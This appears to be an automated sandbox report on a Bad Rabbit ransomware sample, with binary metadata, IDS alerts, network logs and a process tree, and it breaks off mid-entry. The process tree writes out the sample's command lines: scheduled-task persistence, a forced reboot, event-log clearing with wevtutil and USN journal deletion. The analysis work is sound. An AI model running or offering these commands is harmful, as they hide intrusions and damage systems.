                                            • [ASM] VS2013 UPD5 build 40629
                                            • [IMP] VS2008 SP1 build 30729
                                            • [LNK] VS2010 SP1 build 40219
                                            Name                                 | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x6d8c          | 0x64         | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x9000          | 0x7088       | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x689a3         | 0x3488       |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x11000         | 0x1a8        | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_IAT            | 0x4000          | 0x74         | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                                            Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy             | Characteristics
                                            .text  | 0x1000          | 0x2ed3       | 0x3000   | 098c323b1a59bcf15c1feb8055e58931 | False    | 0.6101888020833334  | data      | 6.5841037789243835  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x4000          | 0x302a       | 0x3200   | 9cc3629beb9d1f37932d860de2e3a4f5 | False    | 0.81                | data      | 7.1772588683417196  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data  | 0x8000          | 0x33c        | 0x200    | 4e5d61b2bd73632f0225e39a2e2c5144 | False    | 0.048828125         | data      | 0.1833387916558982  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc  | 0x9000          | 0x7088       | 0x7200   | 256c5e23a9ad8a276128f84017b2d79d | False    | 0.16615268640350878 | data      | 4.204085780982396   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x11000         | 0x24e        | 0x400    | 26cd68101ade4e5f70ab3cd5f35e0ad5 | False    | 0.41796875          | data      | 3.293138685594118   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Name          | RVA    | Size   | Type                                                            | Language | Country       | ZLIB Complexity
                                            RT_ICON       | 0x9254 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0   | English  | United States | 0.20309168443496803
                                            RT_ICON       | 0xa0fc | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0   | English  | United States | 0.21931407942238268
                                            RT_ICON       | 0xa9a4 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0   | English  | United States | 0.2203757225433526
                                            RT_ICON       | 0xaf0c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0  | English  | United States | 0.19230769230769232
                                            RT_ICON       | 0xbfb4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0  | English  | United States | 0.14014522821576764
                                            RT_ICON       | 0xe55c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0  | English  | United States | 0.19230769230769232
                                            RT_ICON       | 0xf604 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0  | English  | United States | 0.39893617021276595
                                            RT_GROUP_ICON | 0xfa6c | 0x68   | data                                                            | English  | United States | 0.6826923076923077
                                            RT_VERSION    | 0xfad4 | 0x450  | data                                                            | English  | United States | 0.37681159420289856
                                            RT_MANIFEST   | 0xff24 | 0x161  | ASCII text, with CRLF line terminators                          | English  | United States | 0.5495750708215298
                                            DLL          | Import
                                            KERNEL32.dll | ExitProcess, GetCommandLineW, GetFileSize, CreateProcessW, HeapAlloc, HeapFree, GetModuleHandleW, GetProcessHeap, WriteFile, GetSystemDirectoryW, ReadFile, GetModuleFileNameW, CreateFileW, lstrcatW, CloseHandle, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter
                                            USER32.dll   | wsprintfW
                                            SHELL32.dll  | CommandLineToArgvW
                                            msvcrt.dll   | wcsstr, memcpy, free, malloc
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T08:19:02.999617+0200 | TCP | 2840787 | ETPRO HUNTING Request for config.json | 49710 | 443 | 192.168.2.7 | 184.28.90.27
2024-07-25T08:19:07.858858+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49722 | 40.68.123.157 | 192.168.2.7
2024-07-25T08:19:03.471374+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49713 | 443 | 192.168.2.7 | 23.216.207.31
2024-07-25T08:19:44.974242+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49747 | 52.165.165.26 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 08:18:46.451400995 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:46.451402903 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:46.529516935 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.596013069 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.601619005 CEST | 445 | 49701 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:18:52.601710081 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.602209091 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.607316017 CEST | 445 | 49701 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:18:52.628818035 CEST | 49702 | 80 | 192.168.2.7 | 192.168.2.1
Jul 25, 2024 08:18:52.705909014 CEST | 49704 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.710833073 CEST | 445 | 49704 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:18:52.710911989 CEST | 49704 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.710953951 CEST | 49704 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:52.716131926 CEST | 445 | 49704 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:18:53.623265982 CEST | 49702 | 80 | 192.168.2.7 | 192.168.2.1
Jul 25, 2024 08:18:55.623266935 CEST | 49702 | 80 | 192.168.2.7 | 192.168.2.1
Jul 25, 2024 08:18:56.060759068 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:56.060791016 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:56.138887882 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:56.821264982 CEST | 49699 | 443 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:18:57.002284050 CEST | 49704 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:19:13.993629932 CEST | 445 | 49701 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:19:13.993866920 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:19:13.993947983 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Jul 25, 2024 08:19:14.274425983 CEST | 445 | 49701 | 104.98.116.138 | 192.168.2.7
Jul 25, 2024 08:19:14.274560928 CEST | 49701 | 445 | 192.168.2.7 | 104.98.116.138
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 08:18:55.518707037 CEST | 52071 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 08:19:02.633927107 CEST | 57798 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 25, 2024 08:18:52.628881931 CEST | 192.168.2.1 | 192.168.2.7 | 827c | (Port unreachable) | Destination Unreachable
Jul 25, 2024 08:18:53.623317003 CEST | 192.168.2.1 | 192.168.2.7 | 827c | (Port unreachable) | Destination Unreachable
Jul 25, 2024 08:18:55.623301029 CEST | 192.168.2.1 | 192.168.2.7 | 827c | (Port unreachable) | Destination Unreachable
Jul 25, 2024 08:19:12.301007032 CEST | 192.168.2.7 | 192.168.2.1 | 8273 | (Port unreachable) | Destination Unreachable
Jul 25, 2024 08:20:32.486186981 CEST | 192.168.2.7 | 192.168.2.1 | 8273 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 08:18:55.518707037 CEST | 192.168.2.7 | 1.1.1.1 | 0x4896 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 08:19:02.633927107 CEST | 192.168.2.7 | 1.1.1.1 | 0x5c6f | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 08:18:55.528186083 CEST | 1.1.1.1 | 192.168.2.7 | 0x4896 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 08:19:02.641774893 CEST | 1.1.1.1 | 192.168.2.7 | 0x5c6f | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false

Target ID: 0
Start time: 02:18:48
Start date: 25/07/2024
Path: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe"
Imagebase: 0x510000
File size: 441'910 bytes
MD5 hash: D7AD0CDDA235608CB4AFB702562FDCFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:18:49
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:18:49
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Imagebase: 0xb30000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, Author: Christiaan Beek
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:18:49
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c schtasks /Delete /F /TN rhaegal
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:18:49
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 02:18:49
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Delete /F /TN rhaegal
Imagebase: 0xb0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\SgrmBroker.exe
Imagebase: 0x7ff7c3260000
File size: 329'504 bytes
MD5 hash: 3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 12
Start time: 02:18:50
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 14
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 15
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\D99F.tmp
Wow64 process (32bit): false
Commandline: "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}
Imagebase: 0x7ff609750000
File size: 62'328 bytes
MD5 hash: 347AC3B6B791054DE3E5720A7144A977
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Imagebase: 0xb0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Imagebase: 0xb0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 02:18:51
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit): true
Commandline: wevtutil cl Setup
Imagebase: 0x8d0000
File size: 208'384 bytes
MD5 hash: 3C0E48DA02447863279B0FE3CE7FE5E8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit): true
Commandline: wevtutil cl System
Imagebase: 0x8d0000
File size: 208'384 bytes
MD5 hash: 3C0E48DA02447863279B0FE3CE7FE5E8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit): true
Commandline: wevtutil cl Security
Imagebase: 0x8d0000
File size: 208'384 bytes
MD5 hash: 3C0E48DA02447863279B0FE3CE7FE5E8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 02:18:52
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit): true
Commandline: wevtutil cl Application
Imagebase: 0x8d0000
File size: 208'384 bytes
MD5 hash: 3C0E48DA02447863279B0FE3CE7FE5E8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 02:18:52
Start date: 25/07/2024
                                            Path:C:\Windows\SysWOW64\fsutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:fsutil usn deletejournal /D C:
                                            Imagebase:0xd0000
                                            File size:167'440 bytes
                                            MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit
                                            Imagebase:0x7ff629640000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:31
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:32
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\dispci.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\dispci.exe" -id 1283680486
                                            Imagebase:0xa80000
                                            File size:142'848 bytes
                                            MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                            • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 96%, ReversingLabs
                                            Has exited:true

                                            Target ID:33
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:34
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Delete /F /TN rhaegal
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:37
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Delete /F /TN rhaegal
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:38
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Delete /F /TN drogon
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:39
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:40
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\LogonUI.exe
                                            Wow64 process (32bit):false
                                            Commandline:"LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d
                                            Imagebase:0x7ff778710000
                                            File size:13'824 bytes
                                            MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:41
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Delete /F /TN drogon
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:42
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:44
                                            Start time:02:18:56
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:48
                                            Start time:02:18:57
